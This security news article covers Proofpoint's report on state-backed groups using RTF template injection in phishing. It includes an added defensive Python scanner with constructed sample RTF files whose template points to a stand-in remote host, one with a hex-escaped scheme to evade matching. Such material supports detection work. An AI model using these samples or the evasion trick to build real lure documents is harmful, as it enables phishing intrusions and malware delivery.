Three different state-sponsored threat actors aligned with China, India, and Russia have been observed adopting a new method called RTF (aka Rich Text Format) template injection as part of their phishing campaigns to deliver malware to targeted systems.
“RTF template injection is a novel technique that is ideal for malicious phishing attachments because it is simple and allows threat actors to retrieve malicious content from a remote URL using an RTF file,” Proofpoint researchers said in a new report shared with The Hacker News.
At the heart of the attack is an RTF file containing decoy content that can be manipulated to enable the retrieval of content, including malicious payloads, hosted at an external URL upon opening the RTF file. Specifically, it leverages the RTF template functionality to alter a document’s formatting properties using a hex editor, specifying a URL resource instead of an accessible file resource destination from which a remote payload may be retrieved.
Put differently, the idea is that attackers can send malicious Microsoft Word documents to targeted victims that appear completely harmless but are designed to load malicious code remotely via the template feature. This makes the mechanism a powerful and effective technique when paired with phishing as an initial delivery vector, the researchers noted.
Thus when an altered RTF file is opened in Microsoft Word, the application will proceed to retrieve the resource from the specified URL before displaying the lure content of the file. It’s therefore not surprising that the technique is being increasingly weaponized by threat actors to distribute malware.
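As an added example (not Proofpoint’s tooling or code from this article), a small Python scanner that pulls every template destination out of an RTF file and flags those naming a URL or UNC path rather than a local file; it also decodes the \'hh hex escapes that a hand-edited file may use to hide the scheme. All sample files, hostnames and paths below are constructed.

```python
import re

# A template destination starting with one of these prefixes points outside the
# local filesystem; a normal RTF template names a local .dot/.dotm file.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "file://", "\\\\")

# Matches {\*\template <destination>} as written in the RTF stream (nested
# groups inside the destination are not handled by this simplified matcher).
_TEMPLATE_RE = re.compile(rb"\{\\\*\\template\s*([^{}]*)\}", re.IGNORECASE)

# Tokens inside the destination: \'hh hex escape, escaped \\ \{ \},
# control words (dropped), CR/LF (dropped), or a plain character.
_TOKEN_RE = re.compile(
    rb"\\'([0-9a-fA-F]{2})|\\([\\{}])|\\[a-zA-Z]+-?\d* ?|\r|\n|(.)", re.DOTALL
)

def decode_rtf_text(raw: bytes) -> str:
    """Turn the raw bytes of an RTF destination into the text Word would see."""
    out = bytearray()
    for m in _TOKEN_RE.finditer(raw):
        if m.group(1):
            out.append(int(m.group(1), 16))   # \'68 -> 'h'
        elif m.group(2):
            out += m.group(2)                 # \\ -> \  (also \{ and \})
        elif m.group(3):
            out += m.group(3)
    return out.decode("latin-1").strip()

def find_template_targets(rtf: bytes) -> list:
    """Return every decoded template destination in the file (empty if not RTF)."""
    if not rtf.lstrip().startswith(b"{\\rtf"):
        return []
    return [decode_rtf_text(m.group(1)) for m in _TEMPLATE_RE.finditer(rtf)]

def is_remote_template(target: str) -> bool:
    """True when the destination is a URL or UNC path rather than a local file."""
    return target.strip().lower().startswith(REMOTE_PREFIXES)

def scan_rtf(rtf: bytes) -> dict:
    targets = find_template_targets(rtf)
    remote = [t for t in targets if is_remote_template(t)]
    return {"template_targets": targets, "remote_targets": remote, "suspicious": bool(remote)}

# Constructed samples (not real malware): a local template, a plain URL
# destination, and the same URL with its scheme hex-escaped to defeat a naive grep.
BENIGN = rb"{\rtf1\ansi{\*\template C:\\Users\\alice\\Templates\\Normal.dotm}\pard Report\par}"
PLAIN_URL = rb"{\rtf1\ansi{\*\template http://template.example.invalid/t.dotm}\pard Report\par}"
HEX_URL = rb"{\rtf1\ansi{\*\template \'68\'74\'74\'70\'73://template.example.invalid/t.dotm}\pard Report\par}"
```

Running `scan_rtf` over a mail gateway’s RTF attachments and alerting on `suspicious` catches the pattern described above regardless of how the URL is encoded in the stream.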
Proofpoint said it observed template injection RTF files attributed to the APT groups DoNot Team, Gamaredon, and a Chinese-related APT actor dubbed TA423 as early as February 2021, with the adversaries using the files to target entities in Pakistan, Sri Lanka, Ukraine, and those operating in the deep water energy exploration sector in Malaysia via defense-themed and other country-specific lures.
While the DoNot Team has been suspected of carrying out cyber attacks aligned with Indian state interests, Gamaredon was recently outed by Ukrainian law enforcement as an outfit linked to Russia’s Federal Security Service (FSB) with a propensity for striking public and private sector organizations in the country, harvesting classified information from compromised Windows systems for geopolitical gain.
“The innovation by threat actors to bring this method to a new file type in RTFs represents an expanding surface area of threat for organizations worldwide,” the researchers said. “While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape.”